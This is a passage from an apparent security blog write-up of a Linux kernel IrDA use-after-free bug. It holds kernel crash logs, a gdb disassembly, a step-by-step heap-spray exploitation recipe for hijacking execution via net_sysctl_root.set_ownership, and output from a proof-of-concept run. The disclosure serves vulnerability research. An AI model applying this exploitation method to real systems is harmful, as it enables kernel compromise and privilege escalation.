class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880234993ac0 <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880235f08300<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-17\"><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000202<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000003<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000063<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000001d30880<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffff88023fc00000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">knlGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ES<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000080050033<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000235ea3000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000006f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">DR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR6<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000fffe0ff0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR7<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irias_insert_object<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x19<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irda_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x17a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1c0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">security_socket_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x3e<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SYSC_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xb0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xe0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">vfs_write<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x155<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1b0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_nanosleep<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x56<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xf0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_write<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xa0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x9<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44a117<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffdb85d5f58<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000287<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000031<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b68d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044a117<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-36\"><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000024<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007ffdb85d5f90<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000006<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000070<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000048eb5a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000000000c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000287<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b6880<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000065<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b68d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ba<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ce <\/span><span class=\"crayon-i\">e8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bf <\/span><span class=\"crayon-e\">af <\/span><span class=\"crayon-i\">ff<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">63<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">85<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">d2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">74<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001697dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">trace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8a8070c4e016c09c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">panic<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">syncing<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Fatal <\/span><span class=\"crayon-i\">exception<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">Offset<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">disabled<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Rebooting <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">seconds<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-48\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-49\"><span class=\"crayon-cn\">0xffffffff81847839<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">153<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rbx<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>Here is the process for gaining control of execution:<br \/> &#8211; Create 4 socket files via socket()<br \/> &#8211; Bind sockets 1 to 3; this allocates objects and inserts them into irias_objects<br \/> &#8211; Bind socket 1 again; this triggers the first bug<br \/> &#8211; Insert sockets 2 &amp; 3 many times (~5)<br \/> &#8211; Close socket 2, then 3; this frees the sockets, and you should see the ias object of socket 3 freed but still queued in the list<br \/> &#8211; Spray the heap to fill the freed object with our payload; we now have control over obj-&gt;q.q_(next\/prev)<br \/> &#8211; Bind socket 4; this is the \u2018what\u2019 pointer to put in the controlled object (obj-&gt;q.q_prev)<br \/> &#8211; Close socket 4 to free the last object<br \/> &#8211; Spray the heap again to control the object<br \/> &#8211; Trigger the overwritten pointer, and you\u2019ll get RIP<\/p>\n<p>Here is a crash PoC showing that we\u2019ve overwritten net_sysctl_root.set_ownership:<\/p>\n<p><!-- Crayon Syntax Highlighter
v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f369705235707\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .\/poc 0xffffffff81efeb60  [+] Freeing the first queued ias object  [+] Spray memory and take control of the old freed object  [+] Allocating new object to
overwrite the targetted pointer  [+] Freeing object again  [ 8.641924] kernel tried to execute NX-protected page - exploit attempt? (uid: 0)  [ 8.642882] BUG: unable to handle kernel paging request at ffff88023623ad20  [ 8.642882] IP: 0xffff88023623ad20  [ 8.642882] PGD 212b067  [ 8.642882] PUD 212e067  [ 8.642882] PMD 80000002362001e3  [ 8.642882]  [ 8.642882] Oops: 0011 [#1] SMP  [ 8.642882] Modules linked in:  [ 8.642882] CPU: 0 PID: 1038 Comm: xx Not tainted 4.10.0-rc8+ #6  [ 8.642882] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04\/01\/2014  [ 8.642882] task: ffff88023575de00 task.stack: ffffc90001434000  [ 8.642882] RIP: 0010:0xffff88023623ad20  [ 8.642882] RSP: 0018:ffffc90001437b60 EFLAGS: 00010282  [ 8.642882] RAX: ffff88023623ad20 RBX: ffff880236c2d148 RCX: ffff880236c2d150  [ 8.642882] RDX: ffff880236c2d14c RSI: ffff8802349a0a70 RDI: ffff8802349a0a00  [ 8.642882] RBP: ffffc90001437b88 R08: ffff88023fc1b840 R09: ffff880234b61230  [ 8.642882] R10: 2f2f2f2f2f2f2f2f R11: 0000000000000000 R12: ffff8802349a0a00  [ 8.642882] R13: ffff8802349a0a70 R14: ffffffff81efeb00 R15: 0000000000000004  [ 8.642882] FS: 